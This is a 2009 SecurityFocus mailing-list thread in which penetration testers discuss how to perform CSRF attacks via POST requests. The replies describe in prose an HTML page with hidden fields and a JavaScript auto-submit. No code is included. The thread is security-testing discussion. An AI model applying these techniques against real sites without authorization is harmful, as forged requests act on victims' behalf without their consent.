SecurityFocus

CSRF through POST Dec 15 2009 12:57AM
Robin Wood (dninja gmail com) (2 replies)

Re: CSRF through POST Dec 22 2009 08:00AM
Himanshu Goyal (idhimanshu gmail com)

Re: CSRF through POST Dec 16 2009 04:37PM
arvind doraiswamy (arvind doraiswamy gmail com) (1 replies)

Re: CSRF through POST Dec 16 2009 04:47PM
Robin Wood (dninja gmail com) (2 replies)

Re: CSRF through POST Dec 24 2009 10:26AM
Amish Shah (amish net-square com) (1 replies)

Re: CSRF through POST Dec 27 2009 05:55AM
YGN Ethical Hacker Group (lists yehg net)

RE: CSRF through POST Dec 21 2009 01:47PM
boaz shunami rsa com (1 replies)

You can also have a javascript event that will fire the submit button
automatically and hence will send the post parameters.

Thanks,

Boaz
-----Original Message-----
From: listbounce (at) securityfocus (dot) com [email concealed] [mailto:listbounce (at) securityfocus (dot) com [email concealed]]
On Behalf Of Robin Wood
Sent: Wednesday, December 16, 2009 6:47 PM
To: arvind doraiswamy
Cc: webappsec (at) securityfocus (dot) com [email concealed]
Subject: Re: CSRF through POST

2009/12/16 arvind doraiswamy <arvind.doraiswamy (at) gmail (dot) com [email concealed]>:
> Hey Robin,
> You shouldn't worry about GET or POST. A CSRF will happen in both
> places. Its just that the GET is easier and more visible.
>
> For a POST you could either use OWASP's CSRF Tester to record and
> replay a request. Or you could create a HTML page manually with all
> hidden variables and just a button as a POC.

It is this bit I was after info on, I could think of a way that I
would attempt a POST but wanted to see research others had done.

As it turns out I've had quite a few good leads passed across, thanks
to everyone. Most work in a similar way but all have slight variations
that are useful to know about when trying to work out the best way to
attack a target.

Robin

>
> Cheers
> Arvind
>
> On Tue, Dec 15, 2009 at 6:27 AM, Robin Wood <dninja (at) gmail (dot) com [email concealed]> wrote:
>> Hi
>> Can anyone point me at any good papers on doing CSRF through POST
>> parameters? I've found some sites with redirect scripts which help
>> performing the attack but no good write-ups on different ways to
>> perform it.
>>
>> Robin
>>
>>
>>
>> This list is sponsored by Cenzic
>> --------------------------------------
>> Let Us Hack You. Before Hackers Do!
>> It's Finally Here - The Cenzic Website HealthCheck. FREE.
>> Request Yours Now!
>> http://www.cenzic.com/2009HClaunch_Securityfocus
>> --------------------------------------
>>
>>
>

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

[ reply ]

Re: CSRF through POST Dec 22 2009 03:59AM
chr1x (chr1x sectester net) (1 replies)

Re: CSRF through POST Dec 22 2009 09:22AM
Robin Wood (dninja gmail com)